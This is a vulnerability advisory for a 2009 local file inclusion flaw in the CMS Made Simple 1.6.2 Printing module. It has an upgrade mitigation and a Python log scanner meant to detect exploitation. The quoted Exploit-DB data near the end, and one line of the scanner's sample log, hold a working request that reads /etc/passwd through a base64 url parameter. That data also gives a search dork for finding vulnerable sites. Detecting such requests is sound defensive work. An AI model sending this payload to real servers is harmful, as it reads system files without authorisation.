Vendor: CMS Made Simple
By: Inclusion Hunter Team
CVSS: 7.5 (HIGH)
Class: LFI
CWE: 98
Product Name: CMS Made Simple
Affected Version From: 1.6.2
Affected Version To: 1.6.2
Patch Exists: YES
CPE: a:cms_made_simple:cms_made_simple
2009

CMS Made Simple <= 1.6.2

A vulnerability exists in the GetURLContent() function of the Printing module in CMS Made Simple 1.6.2 and earlier. The function passes its argument directly to file_get_contents(), so an attacker can read arbitrary files on the server by sending a crafted HTTP request whose url parameter is set to the base64-encoded file path.

Mitigation:

Upgrade to CMS Made Simple version 1.6.3 or later.
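
To check web server logs for past use of this request pattern, the following added example (not part of the original advisory or of CMS Made Simple) decodes the url parameter on requests to modules/Printing/output.php and reports values that are not http(s) URLs. It assumes combined-format access logs and that legitimate print requests carry an absolute http(s) URL; the sample log lines are constructed.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint named in the advisory; compared case-insensitively at the end of the path.
ENDPOINT = "/modules/printing/output.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_url_param(value):
    """Base64-decode the url parameter; return None if it is not valid base64."""
    value = value.replace(" ", "+")  # parse_qs turns a literal '+' into a space
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for requests whose url is not http(s)."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(ENDPOINT):
            continue
        for value in parse_qs(target.query, keep_blank_values=True).get("url", []):
            decoded = decode_url_param(value)
            # Assumption: legitimate print requests carry an absolute http(s) URL.
            if decoded is None or urlsplit(decoded).scheme.lower() not in ("http", "https"):
                hits.append((number, decoded))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2009:10:00:01 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 5120',
    '192.0.2.10 - - [10/Aug/2009:10:00:05 +0000] "GET /cms/modules/Printing/output.php?url=aHR0cDovL2V4YW1wbGUub3JnL2luZGV4LnBocD9wYWdlPWhvbWU= HTTP/1.1" 200 4096',
    '198.51.100.7 - - [10/Aug/2009:10:02:13 +0000] "GET /cms/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 1873',
]

if __name__ == "__main__":
    for number, decoded in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: url decodes to {decoded!r}")
```

A decoded value of None means the parameter was not valid base64, which is reported as well because it does not match the expected request shape.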

Exploit-DB raw data:

#########################################################################################
#
#         [CMS Made Simple <= 1.6.2]
#
# Class:     LFI
# Reported:     29/07/2009
# Public release: 10/08/2009
# Remote:    Yes
# DORK:      "This site is powered by CMS Made Simple version 1."
# Site:      http://www.cmsmadesimple.org/
# Download:  http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
##########################################################################################

Vulnerability:
============================================
function GetURLContent($url) {
    $content = file_get_contents($url);
    return $content;
}
=============================================

Exploit :
================================================================================
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
================================================================================
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64


#ihteam.net - Inclusion Hunter Team 

# milw0rm.com [2009-08-10]